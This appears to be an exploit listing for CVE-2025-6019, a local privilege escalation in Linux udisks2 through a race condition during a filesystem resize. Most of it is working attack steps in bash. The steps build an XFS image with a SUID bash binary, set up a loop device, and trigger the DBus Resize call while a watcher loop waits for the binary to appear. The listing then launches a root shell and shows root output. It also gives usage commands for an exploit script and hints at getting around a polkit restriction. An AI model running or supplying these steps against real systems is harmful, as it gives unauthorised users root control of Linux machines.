Exploit for CVE-2025-6019

Name: Exploit for CVE-2025-6019
Rating: 5 (129 reviews)
2025-06-20 | CVSS 7.0
## https://sploitus.com/exploit?id=793B5C27-64FC-5FCE-AA34-0CEE4A008F38
# CVE-2025-6019: Privilege Escalation Exploit via UDisks2 Filesystem Resize

## Vulnerability Details
- **CVE ID**: CVE-2025-6019
- **Impact**: Local Privilege Escalation (LPE)
- **Affected Systems**: Linux systems with vulnerable `udisks2` versions
- **Mechanism**: Race condition during filesystem resize allows access to SUID binaries in world-writable temporary directories
- **Key Components**: 
  - `udisks2` service (DBus interface)
  - `org.freedesktop.UDisks2.Filesystem.Resize` method
  - Temporary mount points under `/tmp/blockdev*`

## Exploit Workflow
### 1. Prepare Malicious Filesystem Image (Attacker)
```bash
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash  # Set SUID bit
umount ./xfs.mount 
```

### 2. Trigger Exploit (Victim Machine)
```bash
# Verify system capabilities
gdbus call --system --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot

# Clear interference
killall -KILL gvfs-udisks2-volume-monitor

# Setup loop device
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# Background watcher (executes when SUID binary appears)
while true; do 
  /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &

# Trigger vulnerability via DBus
gdbus call --system --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
```
### 3. Gain Root Access
```bash
/tmp/blockdev*/bash -p  # Launch privileged shell
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)
```

## Important! 
Exploit working only in logind session! 

- The script must run from a logind session that is
  Active=yes and Remote=no (e.g. tty1).  
- When it’s started from an SSH / pts/* / reverse-shell session the
  `udisksctl loop-setup --no-user-interaction` call is denied by
  polkit, so the PoC bails out with  
  “Failed to create loop device”.

Notice: 
- If you want to use exploit via SSH, you must drop temporary polkit rule

## How to use exploit 

### Create suid image 
```bash
$ sudo bash exploit.sh create 
```

### exploit system 
```bash
$ bash exploit.sh exploit 
```

### POC Video

![poc](https://github.com/user-attachments/assets/b941cdd1-c21a-4247-a649-94100f83a15c)